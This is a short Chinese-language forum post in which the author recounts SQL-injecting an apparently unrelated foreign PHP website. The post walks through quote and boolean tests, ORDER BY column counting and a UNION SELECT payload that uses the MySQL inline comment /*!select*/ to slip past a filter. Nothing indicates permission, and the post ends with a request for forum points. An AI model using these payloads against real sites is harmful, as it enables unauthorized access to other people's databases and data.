昨天在检测一个外国PHP网站时
在id=255后加'出现forbidden
于是我and 1=1正常  and 1=2出错
说明肯定有注入
接着我order by猜出字段
然后union select 1,2,3,4   //悲剧的又出现了forbidden
肯定是做了过滤了
后来构造了语句id=-255+union+/*!select*/+1,2,3,4
OK!
也是个思路,版主给加点分吧